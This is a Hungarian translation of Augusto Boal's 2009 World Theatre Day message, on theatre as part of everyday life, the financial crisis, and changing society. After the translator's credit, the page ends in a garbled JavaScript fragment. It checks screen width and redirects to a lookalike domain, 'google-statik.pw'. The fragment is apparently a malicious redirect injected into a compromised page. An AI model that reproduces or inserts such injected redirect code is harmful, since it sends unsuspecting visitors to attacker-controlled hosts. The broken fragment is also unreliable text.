SZÍNHÁZI VILÁGNAPI ÜZENET 2009

Augusto Boal irasa:

Kulonosek az emberi tarsadalmak mindennapjai, de bizonyos alkalmakkor megis szinhazi eloadasokra van szuksegunk. Ezek fontos tarsasagi esemenyek, olyanok, mint amilyenre most eljottek.

Nem tudatosul bennunk, de az emberi kapcsolatok szinhazi mintakat kovetnek: a ter hasznalata, a testbeszed, a szavak megvalasztasa, a hanghordozas, a gondolatok es erzelmek utkozese, vagyis mindaz, amit a szinhazban bemutatunk, es sajat eletunkben is megelunk, azt sugallja: a szinhaz teremtett minket!

A menyegzok, a temetesek spektakulumok, de egyben a mindennapi elet jol ismert ritusai is. A ceremoniak, a reggeli kavezasok, a koszonesek, a batortalan szerelmek es a viharos szenvedelyek, a szenatorok tanacskozasa, diplomatak talalkozoja, ez mind szinhaz.

Muveszetunk arra tanit, hogy nyitottan fogadjuk be a mindennapi elet eloadasait, melyekben egyforman vagyunk szineszek es nezok, s elmosodik a szinpad meg a zsollye kozti hatar. Valamennyien muveszek vagyunk: a szinhaz arra tanit, hogy meglassuk azt, ami nyilvanvalo, de mar annyira hozzaszoktunk, hogy eszre sem vesszuk. A megszokott lathatatlanna valik, es epp azert hozunk letre eloadasokat, hogy megvilagitsuk mindennapi eletunk szinpadat.

Mult ev szeptembereben egy varatlan „szinhazi meglepetes" csapott le rank: azt kepzeltuk, hogy biztonsagos vilagban elunk, es bar tavoli, vad tajakon haboruk, nepirtasok, verengzesek tombolnak, embereket kinoznak, mi biztonsagban elunk, penzunket tekintelyes bankokban helyeztuk el, vagy becsuletes brokerre biztuk; aztan azt akartak elhitetni velunk, hogy ez a penz nem is letezett, hogy csak nehany, egyaltalan nem virtualis, de nem is megbizhato vagy tiszteletremelto kozgazdasz siralmas, virtualis agyszulemenye volt. Ez rossz szinhaz, sotet cselszoves, amelyben nehanyan sokat nyertek, es sokan mindent elvesztettek. A gazdag orszagok politikusai titkos megbeszeleseket tartottak, es csodatevo megoldasokkal alltak elo. Mi, a nezok, az aldozatok, az erkely utolso soraiba szorultunk.

Husz evvel ezelott Racine: Phedrajat rendeztem Rio de Janeiroban. A diszlet szegenyes volt: a foldon ket tehenbor, korulotte bambuszrudak. Minden eloadas elott a kovetkezoket mondtam a szineszeimnek: „Vege a probaknak, annak, hogy naprol napra ujabb variaciokat probaljunk ki. Amikor atlepitek a bambuszkeritest, kozuletek senki sem hazudhat tobbe. A szinhaz az elrejtett igazsag maga."

Amikor a felszin moge nezunk: mindenutt elnyomokat es elnyomottakat, osztalyokat es kasztokat latunk, egy igazsagtalan, kegyetlen vilagot talalunk. A mi dolgunk, hogy egy masfajta tarsadalmat kepzeljunk el. Meggyozodesunk, hogy ez lehetseges. A mi dolgunk hat, hogy ezt a szinpad deszkain es az eletben megvalositsuk.

Nezzek meg az eloadast, es amikor hazaternek, jatsszak el a sajat darabjukat, es vegyek eszre azt, ami kiboki a szemuk, de soha nem lattak meg. A szinhaz nem esemeny, hanem eletmod!

Mindannyian szineszek vagyunk: allampolgarnak lenni annyit jelent, hogy nem elegszunk meg azzal, hogy tarsadalomban elunk, hanem megvaltoztatjuk azt.

Forditotta: Lakos Anna

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width